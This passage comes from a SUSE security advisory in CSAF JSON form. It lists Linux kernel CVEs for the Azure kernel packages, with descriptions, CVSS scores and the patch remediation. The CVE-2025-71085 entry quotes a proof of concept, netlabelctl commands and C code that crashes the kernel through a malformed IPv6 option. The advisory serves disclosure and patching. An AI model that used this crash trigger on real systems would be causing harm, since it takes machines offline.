"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-12T11:26:05Z",
"details": "moderate"
}
],
"title": "CVE-2025-71082"
},
{
"cve": "CVE-2025-71083",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71083"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/ttm: Avoid NULL pointer deref for evicted BOs\n\nIt is possible for a BO to exist that is not currently associated with a\nresource, e.g. because it has been evicted.\n\nWhen devcoredump tries to read the contents of all BOs for dumping, we need\nto expect this as well -- in this case, ENODATA is recorded instead of the\nbuffer contents.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71083",
"url": "https://www.suse.com/security/cve/CVE-2025-71083"
},
{
"category": "external",
"summary": "SUSE Bug 1256610 for CVE-2025-71083",
"url": "https://bugzilla.suse.com/1256610"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-12T11:26:05Z",
"details": "moderate"
}
],
"title": "CVE-2025-71083"
},
{
"cve": "CVE-2025-71084",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71084"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nRDMA/cm: Fix leaking the multicast GID table reference\n\nIf the CM ID is destroyed while the CM event for multicast creating is\nstill queued the cancel_work_sync() will prevent the work from running\nwhich also prevents destroying the ah_attr. This leaks a refcount and\ntriggers a WARN:\n\n GID entry ref leak for dev syz1 index 2 ref=573\n WARNING: CPU: 1 PID: 655 at drivers/infiniband/core/cache.c:809 release_gid_table drivers/infiniband/core/cache.c:806 [inline]\n WARNING: CPU: 1 PID: 655 at drivers/infiniband/core/cache.c:809 gid_table_release_one+0x284/0x3cc drivers/infiniband/core/cache.c:886\n\nDestroy the ah_attr after canceling the work, it is safe to call this\ntwice.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71084",
"url": "https://www.suse.com/security/cve/CVE-2025-71084"
},
{
"category": "external",
"summary": "SUSE Bug 1256622 for CVE-2025-71084",
"url": "https://bugzilla.suse.com/1256622"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 2.5,
"baseSeverity": "LOW",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-12T11:26:05Z",
"details": "low"
}
],
"title": "CVE-2025-71084"
},
{
"cve": "CVE-2025-71085",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71085"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nipv6: BUG() in pskb_expand_head() as part of calipso_skbuff_setattr()\n\nThere exists a kernel oops caused by a BUG_ON(nhead \u003c 0) at\nnet/core/skbuff.c:2232 in pskb_expand_head().\nThis bug is triggered as part of the calipso_skbuff_setattr()\nroutine when skb_cow() is passed headroom \u003e INT_MAX\n(i.e. (int)(skb_headroom(skb) + len_delta) \u003c 0).\n\nThe root cause of the bug is due to an implicit integer cast in\n__skb_cow(). The check (headroom \u003e skb_headroom(skb)) is meant to ensure\nthat delta = headroom - skb_headroom(skb) is never negative, otherwise\nwe will trigger a BUG_ON in pskb_expand_head(). However, if\nheadroom \u003e INT_MAX and delta \u003c= -NET_SKB_PAD, the check passes, delta\nbecomes negative, and pskb_expand_head() is passed a negative value for\nnhead.\n\nFix the trigger condition in calipso_skbuff_setattr(). Avoid passing\n\"negative\" headroom sizes to skb_cow() within calipso_skbuff_setattr()\nby only using skb_cow() to grow headroom.\n\nPoC:\n\tUsing `netlabelctl` tool:\n\n netlabelctl map del default\n netlabelctl calipso add pass doi:7\n netlabelctl map add default address:0::1/128 protocol:calipso,7\n\n Then run the following PoC:\n\n int fd = socket(AF_INET6, SOCK_DGRAM, IPPROTO_UDP);\n\n // setup msghdr\n int cmsg_size = 2;\n int cmsg_len = 0x60;\n struct msghdr msg;\n struct sockaddr_in6 dest_addr;\n struct cmsghdr * cmsg = (struct cmsghdr *) calloc(1,\n sizeof(struct cmsghdr) + cmsg_len);\n msg.msg_name = \u0026dest_addr;\n msg.msg_namelen = sizeof(dest_addr);\n msg.msg_iov = NULL;\n msg.msg_iovlen = 0;\n msg.msg_control = cmsg;\n msg.msg_controllen = cmsg_len;\n msg.msg_flags = 0;\n\n // setup sockaddr\n dest_addr.sin6_family = AF_INET6;\n dest_addr.sin6_port = htons(31337);\n dest_addr.sin6_flowinfo = htonl(31337);\n dest_addr.sin6_addr = in6addr_loopback;\n dest_addr.sin6_scope_id = 31337;\n\n // setup cmsghdr\n cmsg-\u003ecmsg_len = cmsg_len;\n cmsg-\u003ecmsg_level = IPPROTO_IPV6;\n cmsg-\u003ecmsg_type = IPV6_HOPOPTS;\n char * hop_hdr = (char *)cmsg + sizeof(struct cmsghdr);\n hop_hdr[1] = 0x9; //set hop size - (0x9 + 1) * 8 = 80\n\n sendmsg(fd, \u0026msg, 0);",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71085",
"url": "https://www.suse.com/security/cve/CVE-2025-71085"
},
{
"category": "external",
"summary": "SUSE Bug 1256623 for CVE-2025-71085",
"url": "https://bugzilla.suse.com/1256623"
},
{
"category": "external",
"summary": "SUSE Bug 1256624 for CVE-2025-71085",
"url": "https://bugzilla.suse.com/1256624"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-12T11:26:05Z",
"details": "important"
}
],
"title": "CVE-2025-71085"
},
{
"cve": "CVE-2025-71086",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71086"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: rose: fix invalid array index in rose_kill_by_device()\n\nrose_kill_by_device() collects sockets into a local array[] and then\niterates over them to disconnect sockets bound to a device being brought\ndown.\n\nThe loop mistakenly indexes array[cnt] instead of array[i]. For cnt \u003c\nARRAY_SIZE(array), this reads an uninitialized entry; for cnt ==\nARRAY_SIZE(array), it is an out-of-bounds read. Either case can lead to\nan invalid socket pointer dereference and also leaks references taken\nvia sock_hold().\n\nFix the index to use i.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71086",
"url": "https://www.suse.com/security/cve/CVE-2025-71086"
},
{
"category": "external",
"summary": "SUSE Bug 1256625 for CVE-2025-71086",
"url": "https://bugzilla.suse.com/1256625"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.4,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-12T11:26:05Z",
"details": "moderate"
}
],
"title": "CVE-2025-71086"
},
{
"cve": "CVE-2025-71087",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71087"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\niavf: fix off-by-one issues in iavf_config_rss_reg()\n\nThere are off-by-one bugs when configuring RSS hash key and lookup\ntable, causing out-of-bounds reads to memory [1] and out-of-bounds\nwrites to device registers.\n\nBefore commit 43a3d9ba34c9 (\"i40evf: Allow PF driver to configure RSS\"),\nthe loop upper bounds were:\n i \u003c= I40E_VFQF_{HKEY,HLUT}_MAX_INDEX\nwhich is safe since the value is the last valid index.\n\nThat commit changed the bounds to:\n i \u003c= adapter-\u003erss_{key,lut}_size / 4\nwhere `rss_{key,lut}_size / 4` is the number of dwords, so the last\nvalid index is `(rss_{key,lut}_size / 4) - 1`. Therefore, using `\u003c=`\naccesses one element past the end.\n\nFix the issues by using `\u003c` instead of `\u003c=`, ensuring we do not exceed\nthe bounds.\n\n[1] KASAN splat about rss_key_size off-by-one\n BUG: KASAN: slab-out-of-bounds in iavf_config_rss+0x619/0x800\n Read of size 4 at addr ffff888102c50134 by task kworker/u8:6/63\n\n CPU: 0 UID: 0 PID: 63 Comm: kworker/u8:6 Not tainted 6.18.0-rc2-enjuk-tnguy-00378-g3005f5b77652-dirty #156 PREEMPT(voluntary)\n Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.16.3-debian-1.16.3-2 04/01/2014\n Workqueue: iavf iavf_watchdog_task\n Call Trace:\n \u003cTASK\u003e\n dump_stack_lvl+0x6f/0xb0\n print_report+0x170/0x4f3\n kasan_report+0xe1/0x1a0\n iavf_config_rss+0x619/0x800\n iavf_watchdog_task+0x2be7/0x3230\n process_one_work+0x7fd/0x1420\n worker_thread+0x4d1/0xd40\n kthread+0x344/0x660\n ret_from_fork+0x249/0x320\n ret_from_fork_asm+0x1a/0x30\n \u003c/TASK\u003e\n\n Allocated by task 63:\n kasan_save_stack+0x30/0x50\n kasan_save_track+0x14/0x30\n __kasan_kmalloc+0x7f/0x90\n __kmalloc_noprof+0x246/0x6f0\n iavf_watchdog_task+0x28fc/0x3230\n process_one_work+0x7fd/0x1420\n worker_thread+0x4d1/0xd40\n kthread+0x344/0x660\n ret_from_fork+0x249/0x320\n ret_from_fork_asm+0x1a/0x30\n\n The buggy address belongs to the object at ffff888102c50100\n which belongs to the cache kmalloc-64 of size 64\n The buggy address is located 0 bytes to the right of\n allocated 52-byte region [ffff888102c50100, ffff888102c50134)\n\n The buggy address belongs to the physical page:\n page: refcount:0 mapcount:0 mapping:0000000000000000 index:0x0 pfn:0x102c50\n flags: 0x200000000000000(node=0|zone=2)\n page_type: f5(slab)\n raw: 0200000000000000 ffff8881000418c0 dead000000000122 0000000000000000\n raw: 0000000000000000 0000000080200020 00000000f5000000 0000000000000000\n page dumped because: kasan: bad access detected\n\n Memory state around the buggy address:\n ffff888102c50000: 00 00 00 00 00 00 00 fc fc fc fc fc fc fc fc fc\n ffff888102c50080: 00 00 00 00 00 00 00 fc fc fc fc fc fc fc fc fc\n \u003effff888102c50100: 00 00 00 00 00 00 04 fc fc fc fc fc fc fc fc fc\n ^\n ffff888102c50180: 00 00 00 00 00 00 00 00 fc fc fc fc fc fc fc fc\n ffff888102c50200: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71087",
"url": "https://www.suse.com/security/cve/CVE-2025-71087"
},
{
"category": "external",
"summary": "SUSE Bug 1256628 for CVE-2025-71087",
"url": "https://bugzilla.suse.com/1256628"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.6,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-12T11:26:05Z",
"details": "moderate"
}
],
"title": "CVE-2025-71087"
},
{
"cve": "CVE-2025-71088",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71088"
}
],
"notes": [
{
"category": "general",
